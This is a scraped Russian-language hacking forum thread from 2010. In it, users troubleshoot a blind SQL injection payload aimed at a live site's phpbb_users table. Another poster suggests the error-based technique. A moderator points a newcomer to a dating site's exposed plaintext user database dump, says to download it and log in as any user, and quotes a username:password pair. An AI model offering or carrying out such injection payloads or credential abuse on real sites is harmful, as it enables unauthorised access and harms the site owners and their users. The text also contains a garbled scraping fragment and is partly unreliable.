HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #15961  
Старый 26.12.2010, 21:14
попугай
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557

Репутация: 606


По умолчанию

Цитата:
Сообщение от cipa21  
cipa21 said:
Немножко не по теме, извините!
Кто знает по каким причинам не работает inj3kt0r.com ? Последний раз я заходил туда месяца 3-4 назад...
http://whois.domaintools.com/inj3ct0r.com

Note: This Domain Name is Suspended.

In this status the domain name is InActive and will not function.
 
Ответить с цитированием

  #15962  
Старый 26.12.2010, 21:48
cipa21
Новичок
Регистрация: 09.04.2009
Сообщений: 8
Провел на форуме:
71852

Репутация: 0
По умолчанию

Цитата:
Сообщение от попугай  
попугай said:
http://whois.domaintools.com/inj3ct0r.com
Note: This Domain Name is Suspended.
In this status the domain name is InActive and will not function.
Подозрительно все это, такой ресурс хороший...Ну все равно спасибо за ответ!
 
Ответить с цитированием

  #15963  
Старый 26.12.2010, 21:52
InferNo23
Участник форума
Регистрация: 05.09.2006
Сообщений: 187
Провел на форуме:
6860213

Репутация: 378
По умолчанию

делаю запрос (id*IF(ASCII(SUBSTRING(version(),1,1))=53,1,-1)) все ок, ясно что версия 5

но когда пытаюсь выбрать из базы:

(id*IF(ASCII(SUBSTRING(select+1+from+phpbb_users,1 ,1))=53,1,-1))

вылазит ошибка

Invalid SQL: SELECT * FROM `arts` WHERE id = (id*IF(ASCII(SUBSTRING(select+1+from+phpbb_users,1 ,1))=53,1,-1))

Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'select+1+from+phpbb_users,1,1))=53,1,-1))' at line 1

в чем проблема?
 
Ответить с цитированием

  #15964  
Старый 26.12.2010, 21:58
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094

Репутация: 672


Отправить сообщение для Konqi с помощью ICQ
По умолчанию

InferNo23

подзапрос select надо взять в скобки

SUBSTRING((select+1+from+phpbb_users+limit+0,1),1 ,1))=53,1,-1))
 
Ответить с цитированием

  #15965  
Старый 26.12.2010, 22:14
InferNo23
Участник форума
Регистрация: 05.09.2006
Сообщений: 187
Провел на форуме:
6860213

Репутация: 378
По умолчанию

Цитата:
Сообщение от Konqi  
Konqi said:
InferNo23
подзапрос select надо взять в скобки
SUBSTRING(
(
select+1+from+phpbb_users+limit+0,1
)
,1 ,1))=53,1,-1))
(id*IF(ASCII(SUBSTRING((select+1+from+phpbb_users+ limit+0,1),1,1))=53,1,-1))

теперь

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'from+phpbb_users+limit+0,1),1,1))=53,1,-1))' at line 1
 
Ответить с цитированием

  #15966  
Старый 26.12.2010, 22:15
DesCent
Guest
Сообщений: n/a
Провел на форуме:
73674

Репутация: 16
По умолчанию

Цитата:
Сообщение от None  
Кто знает по каким причинам не работает inj3kt0r.com ? Последний раз я заходил туда месяца 3-4 назад...
Цитата:
Сообщение от None  
http://whois.domaintools.com/inj3ct0r.com
Note: This Domain Name is Suspended.
In this status the domain name is InActive and will not function.
" if author else f"
Цитата:
Кто знает по каким причинам не работает inj3kt0r.com ? Последний раз я заходил туда месяца 3-4 назад...
Цитата:
Сообщение от None  
http://whois.domaintools.com/inj3ct0r.com
Note: This Domain Name is Suspended.
In this status the domain name is InActive and will not function.
Вродь дернули на 1337db.com, но сайт тоже не отвечает.

Следите за ихним твиттером, возможно, объявятся еще.
 
Ответить с цитированием

  #15967  
Старый 26.12.2010, 22:25
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094

Репутация: 672


Отправить сообщение для Konqi с помощью ICQ
По умолчанию

InferNo23

так закрытыми глазами ниче сказать не могу, если не жалко скинь сайт, посмотрим.

ах да забыл сказать, если там видна ошибка мускула, ты не пробовал проводить error based иньекцию?

зачем посимвольно..
 
Ответить с цитированием

  #15968  
Старый 27.12.2010, 15:26
Dagger
Guest
Сообщений: n/a
Провел на форуме:
0

Репутация: 0
По умолчанию

http://www.tringuladating.com//db/

Что это, и с чем его едят-))) Просьба не смеяться- я учусь только.
 
Ответить с цитированием

  #15969  
Старый 27.12.2010, 15:35
Kusto
Moderator - Level 7
Регистрация: 04.02.2007
Сообщений: 554
Провел на форуме:
7518056

Репутация: 1089


Отправить сообщение для Kusto с помощью ICQ
По умолчанию

Цитата:
Сообщение от Dagger  
Dagger said:
http://www.tringuladating.com//db/
Что это, и с чем его едят-))) Просьба не смеяться- я учусь только.
странно- там дамп БД юзерей в плейнтексте trindating_user.sql.gz скачивай и заходи под любым ну как пример meetmeone:meetmeone ,у большинства пароль просто password из чего делаем вывод что наполнял его сам админ и больше полофины юзерей- фейки
 
Ответить с цитированием

  #15970  
Старый 27.12.2010, 15:42
Dagger
Guest
Сообщений: n/a
Провел на форуме:
0

Репутация: 0
По умолчанию

Цитата:
Сообщение от Kusto  
Kusto said:
странно- там дамп БД юзерей в плейнтексте
trindating_user.sql.gz скачивай и заходи под любым ну как пример meetmeone:meetmeone
А чем и как правильно скачать? Он то и блокнотом открывается, но как то в перемешку, как его обработать?
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ